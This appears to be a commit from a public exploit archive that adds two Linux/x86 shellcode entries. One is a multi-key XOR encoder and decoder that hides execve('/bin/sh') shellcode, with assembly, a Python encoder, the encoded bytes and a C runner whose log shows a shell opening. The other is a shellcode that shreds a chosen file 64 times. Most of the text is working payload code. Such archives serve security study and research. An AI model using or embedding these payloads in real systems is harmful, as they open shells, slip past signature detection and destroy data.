46791,shellcodes/linux_x86/46791.c,"Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86
46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator
46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86

1 id file description date author type platform
961 46746 shellcodes/generator/46746.txt Linux/x86 - Rabbit Shellcode Crypter (200 bytes) 2019-04-24 Petr Javorik shellcode generator
962 46789 shellcodes/linux_x86/46789.txt Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper 2019-05-03 Dave Sully shellcode linux_x86
963 46791 shellcodes/linux_x86/46791.c Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes) 2019-05-03 strider shellcode linux_x86
964 46800 shellcodes/generator/46800.txt Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes) 2019-05-06 Xavi Beltran shellcode generator
965 46801 shellcodes/linux_x86/46801.txt Linux/x86 - shred file Shellcode (72 bytes) 2019-05-06 strider shellcode linux_x86

139
shellcodes/generator/46800.txt Normal file
View file

@ -0,0 +1,139 @@
# Title: Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)
# Author: Xavi Beltran
# Date: 05/05/2019
# Contact: xavibeltran@protonmail.com
# Purpose: spawn /bin/sh shell
# Tested On: Ubuntu 3.5.0-17-generic
# Arch: x86
# Size: 59 bytes
############################################## sh.nasm ###############################################
global _start
section .text
_start:
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80
###################################### original shellcode #############################################
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
################################# encoder-xor-multiple-keys.py ######################################
#!/usr/bin/python
# Autor: Xavi Beltran
# Date: 05/05/2019
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode ...'
i = 1
for x in bytearray(shellcode) :
if i == 11:
i = 1
y = x^i
encoded += '\\x'
encoded += '%02x' % y
encoded2 += '0x'
encoded2 += '%02x,' %y
i = i + 0x01
print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
######################################### Encoded Shellcode ###############################################
socket@ubuntu:~/Assesments/4$ python encoder-xor-multiple-keys.py
Encoded shellcode ...
\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85
0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85,
Len: 25
#################################### decoder-xor-multiple-keys.nasm ###############################################
; Filename: xor-decoder-multiple-keys.nasm
; Author: Xavi Beltran
; Date: 05/05/2019
global _start
section .text
_start:
xor edx, edx
mov dl, 1
jmp short call_decoder
decoder:
pop esi
xor ecx, ecx
mov cl, 25
decode:
cmp dl, 0x0b
jz xor_counter
xor byte [esi], dl
inc esi
inc dl
loop decode
jmp short Shellcode
xor_counter:
mov dl, 1
jmp decode
call_decoder:
call decoder
Shellcode: db 0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85
############################################### final shellcode ################################################
socket@ubuntu:~/Assesments/4$ ./objdump_parser.sh decoder-xor-multiple-keys
"\x31\xd2\xb2\x01\xeb\x17\x5e\x31\xc9\xb1\x19\x80\xfa\x0b\x74\x09\x30\x16\x46\xfe\xc2\xe2\xf4\xeb\x09\xb2\x01\xeb\xee\xe8\xe4\xff\xff\xff\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85"
socket@ubuntu:~/Assesments/4$ ./shellcode
Shellcode Length: 59
$ whoami
socket
socket@ubuntu:~/Assesments/4$ cat shellcode.c
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xd2\xb2\x01\xeb\x17\x5e\x31\xc9\xb1\x19\x80\xfa\x0b\x74\x09\x30\x16\x46\xfe\xc2\xe2\xf4\xeb\x09\xb2\x01\xeb\xee\xe8\xe4\xff\xff\xff\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

76
shellcodes/linux_x86/46801.txt Normal file
View file

@ -0,0 +1,76 @@
# Exploit Title: Linux/x86 shred file (72 bytes)
# Google Dork: None
# Date: 02.05.2019
# Exploit Author: strider
# Vendor Homepage: None
# Software Link: None
# Tested on: Debian 9 Stretch i386/ Kali Linux i386
# CVE : None
# Shellcode Length: 72
------------------------------[Description]---------------------------------
This shellcode shred files 64 times
replace test.txt with any file you want.
-----------------------------[Shellcode Dump]---------------------------------
section .text
global _start
_start:
xor eax, eax
push eax
push word 0x6465
push 0x7268732f
push 0x6e69622f
push 0x7273752f
mov ebx, esp
jmp short _file
_params:
pop ecx
mov ebp, ecx
xor ecx, ecx
push eax
push 0x6e7a762d
mov esi, esp
push eax
push word 0x3436
xor edx, edx
mov edi, esp
_exec:
push eax
push ebp
push edi
push esi
push ebx
mov ecx, esp
mov al, 0xb
int 0x80
_file:
call _params
string db "test.txt"; replace test.txt with any file you want
-----------------------------[Compile]---------------------------------------------
gcc -m32 -fno-stack-protector -z execstack -o tester tester.c
-----------------------------[C-Code]-----------------------------
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = "\x31\xc0\x50\x66\x68\x65\x64\x68\x2f\x73\x68\x72\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\xeb\x21\x59\x89\xcd\x31\xc9\x50\x68\x2d\x76\x7a\x6e\x89\xe6\x50\x66\x68\x36\x34\x31\xd2\x89\xe7\x50\x55\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xda\xff\xff\xff\x74\x65\x73\x74\x2e\x74\x78\x74";
void main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}